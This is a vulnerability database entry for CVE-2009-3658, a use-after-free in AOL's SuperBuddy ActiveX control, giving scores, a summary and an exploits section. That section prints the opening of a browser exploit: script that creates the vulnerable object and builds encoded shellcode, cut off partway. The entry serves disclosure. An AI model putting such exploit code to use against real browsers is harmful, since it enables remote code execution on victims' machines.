CVE-2009-3658

Published: 09/10/2009 Updated: 03/02/2024
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Use-after-free vulnerability in the Sb.SuperBuddy.1 ActiveX control (sb.dll) in America Online (AOL) 9.5.0.1 allows remote malicious users to trigger memory corruption or possibly execute arbitrary code via a malformed argument to the SetSuperBuddy method.

Vulnerable Product

aol superbuddy activex control 9.5.0.1

Exploits

<script language='vbscript'> Set obj = CreateObject("SbSuperBuddy1") </script> <script language='javascript'> shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" ...